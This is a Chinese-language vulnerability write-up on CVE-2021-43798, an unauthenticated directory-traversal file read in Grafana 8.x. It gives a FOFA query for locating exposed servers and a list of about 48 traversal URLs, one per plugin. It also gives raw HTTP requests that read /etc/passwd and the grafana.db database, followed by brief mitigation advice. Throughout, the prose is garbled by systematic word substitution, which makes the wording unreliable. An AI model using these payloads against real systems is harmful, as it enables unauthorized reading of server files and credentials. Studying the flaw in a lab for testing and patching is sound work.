破绽描绘

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置衔接的数据源之后，Grafana能够在网络阅读器里显现数据图表和正告。

Grafana 存在未受权恣意文件读取破绽，攻击者在未经身份考证的状况下可经过该破绽读取主机上的恣意文件。

2021年12月8日，Grafana 组件存在恣意文件读取破绽的信息，破绽编号：CVE-2021-43798，破绽要挟等级：高危。
该破绽是由于未对途径做正轨化处置招致目录穿越，攻击者可应用该破绽在未受权的状况下，结构歹意数据执行恣意文件读取攻击，最终形成效劳器敏感信息泄露。
 

影响范围

8.0.0-beta1 ≤ Grafana ≤ 8.3.0(8.0.7、8.1.8、8.2.7更新补丁的不受影响)

Vulfocus 靶场环境

目前 Vulfocus 曾经集成 Grafana 环境，可经过以下链接启动环境测试：

http://vulfocus.fofa.so/#/dashboard?image_id=2d3a40d6-feb0-4901-b782-9ed274c09aa3

也可经过 docker pull vulfocus/grafana-read_arbitrary_file:latest 拉取本地环境运转。
 

破绽复现

FOFA 查询

app="Grafana"

poc

https://github.com/ScorpionsMAX/Grafana-loophole

每个 Grafana 实例都预装了 Prometheus 插件或 MySQL 插件等插件，因而每个实例的以下 URL 都容易遭到攻击：

/public/plugins/alertGroups/../../../../../../../../etc/passwd

/public/plugins/alertlist/../../../../../../../../etc/passwd

/public/plugins/alertmanager/../../../../../../../../etc/passwd

/public/plugins/annolist/../../../../../../../../etc/passwd

/public/plugins/barchart/../../../../../../../../etc/passwd

/public/plugins/bargauge/../../../../../../../../etc/passwd

/public/plugins/canvas/../../../../../../../../etc/passwd

/public/plugins/cloudwatch/../../../../../../../../etc/passwd

/public/plugins/dashboard/../../../../../../../../etc/passwd

/public/plugins/dashlist/../../../../../../../../etc/passwd

/public/plugins/debug/../../../../../../../../etc/passwd

/public/plugins/elasticsearch/../../../../../../../../etc/passwd

/public/plugins/gauge/../../../../../../../../etc/passwd

/public/plugins/geomap/../../../../../../../../etc/passwd

/public/plugins/gettingstarted/../../../../../../../../etc/passwd

/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd

/public/plugins/grafana/../../../../../../../../etc/passwd

/public/plugins/graph/../../../../../../../../etc/passwd

/public/plugins/graphite/../../../../../../../../etc/passwd

/public/plugins/heatmap/../../../../../../../../etc/passwd

/public/plugins/histogram/../../../../../../../../etc/passwd

/public/plugins/influxdb/../../../../../../../../etc/passwd

/public/plugins/jaeger/../../../../../../../../etc/passwd

/public/plugins/live/../../../../../../../../etc/passwd

/public/plugins/logs/../../../../../../../../etc/passwd

/public/plugins/loki/../../../../../../../../etc/passwd

/public/plugins/mixed/../../../../../../../../etc/passwd

/public/plugins/mssql/../../../../../../../../etc/passwd

/public/plugins/mysql/../../../../../../../../etc/passwd

/public/plugins/news/../../../../../../../../etc/passwd

/public/plugins/nodeGraph/../../../../../../../../etc/passwd

/public/plugins/opentsdb/../../../../../../../../etc/passwd

/public/plugins/piechart/../../../../../../../../etc/passwd

/public/plugins/pluginlist/../../../../../../../../etc/passwd

/public/plugins/postgres/../../../../../../../../etc/passwd

/public/plugins/prometheus/../../../../../../../../etc/passwd

/public/plugins/stat/../../../../../../../../etc/passwd

/public/plugins/state-timeline/../../../../../../../../etc/passwd

/public/plugins/status-history/../../../../../../../../etc/passwd

/public/plugins/table-old/../../../../../../../../etc/passwd

/public/plugins/table/../../../../../../../../etc/passwd

/public/plugins/tempo/../../../../../../../../etc/passwd

/public/plugins/testdata/../../../../../../../../etc/passwd

/public/plugins/text/../../../../../../../../etc/passwd

/public/plugins/timeseries/../../../../../../../../etc/passwd

/public/plugins/welcome/../../../../../../../../etc/passwd

/public/plugins/xychart/../../../../../../../../etc/passwd

/public/plugins/zipkin/../../../../../../../../etc/passwd

恳求

GET /public/plugins/welcome/../../../../../../../../etc/passwd HTTP/1.1

Host: localhost:3000

Connection: close

读/etc/passwd只能算测试，要想应用的话目前比拟有实践状况的就是读取db文件。

GET /public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1

Host: localhost:3000

Connection: close

修复倡议

目前没有细致的处理计划提供，请关注厂商主页更新：https://grafana.com/
 

暂时修复倡议

1、经过防火墙等平安设备设置访问战略，设置白名单访问。
2、如非必要，制止公网访问该系统。
 

感谢您的来访，获取更多精彩文章请收藏本站。